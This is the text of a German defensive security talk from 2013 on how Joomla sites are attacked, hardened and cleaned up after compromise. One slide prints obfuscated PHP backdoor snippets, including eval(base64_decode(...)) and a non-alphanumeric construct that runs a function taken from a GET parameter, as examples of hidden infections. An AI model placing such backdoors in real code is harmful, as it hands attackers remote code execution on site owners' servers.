1. Angriffe auf Joomla verstehen und verhindern. Simon Samtleben Joomla!Day Deutschland 2013 www.yagendoo.com

2. Simon Samtleben @lemmingzshadow Webentwickler @ yagendoo Media GmbH in Kln www.yagendoo.com | lemmingzshadow.net PHP Entwicklung Joomla Websockets Serveradministration Debian Nginx Security yagendoo.com gulli.com anonym.to 3gstore.de iphoneohnevertrag.de 3. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System infizieren. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schtzen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde? 4. Schwachstellen finden Bruteforceing Joomla SSH/(S)FTP Google Dorks Sicherheitslcken SQL Injection RFC, LFC 5. Bild: webroot.com 6. Schwachstellen finden Bruteforceing Joomla SSH/(S)FTP Google Dorks Sicherheitslcken SQL Injection RFC, LFC 7. Bild: webroot.com 8. Schwachstellen finden Bruteforceing Joomla SSH/(S)FTP Google Dorks Sicherheitslcken SQL Injection RFC, LFC 9. System infizieren Vollstndig automatisiert Typische Injections Webshells Iframes Javascripts (Cookie Bombs, ...) Cloaking/Redirects Sonstiges (IRC Bots, ...) 10. Bild: webroot.com 11. Bild: webroot.com 12. Warum werden (Joomla) Webseiten angegriffen? Verbreitung von Malware Aufbau von Botnets E-Mail Spam Backlinks / SEO Gezielte Angriffe Stehlen von Daten 13. Die Masse macht's 14. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System infizieren. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schtzen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde? 15. Serverseitige Schutzmanahmen Auto IP-Blacklisting SSH Login nur ber Keys Chroot fr Projekte SFTP statt FTP Eigene SQL Benutzer pro Projekt Monitoring (Last, Prozesse, Netzwerk, ) Updates, Updates, Updates 16. Joomlaseitige Schutzmanahmen Nicht bentigte Erweiterungen lschen Auch bei Schutzsoftware vorsichtig sein Vorsicht bei lange nicht aktualisierten Erweiterungen Regelmig auf Infektionen prfen urlquery.net virustotal.com myjoomla.com Extensions 17. Joomlaseitige Schutzmanahmen Regelmige Backup Akeeba Backup Duply, Rsync, Snapshots, Auch alte Backups vorhalten! Updates, Updates, UPDATES! Joomla & Extensions Newsletter, Blogs, Auto-Update, ... 18. Inhalt 1.Wie funktionieren Angriffe auf Joomla? 1. Schwachstellen finden. 2. System infizieren. 3. Warum werden (Joomla) Webseiten angegriffen? 2.Wie kann ich mein System schtzen? 1. Serverseitig 2. Joomla 3.Was tun wenn mein System kompromittiert wurde? 19. Was tun wenn mein System kompromittiert wurde? Don't Panic Keine wichtige Spuren lschen. Backup anlegen. Wenn mglich: Neu aufsetzen. Wenn nicht: Backup einspielen. Sonst: Infektionen beseitigen. 20. Was tun wenn mein System kompromittiert wurde? Infektionen sind schwer zu finden Einfach eval(base64_decode('...')); Schwieriger $eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir); Hacker :) $_[]++;$_[]=$_._;$_=$_[$_[+_]];$___=$__=$_[++ $__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++ $___.$___.++$_.$__.++$___; $_($_GET['p']); 21. Fragen? www.yagendoo.com lemmingzshadow.net 22. Vielen Dank fr's Zuhren!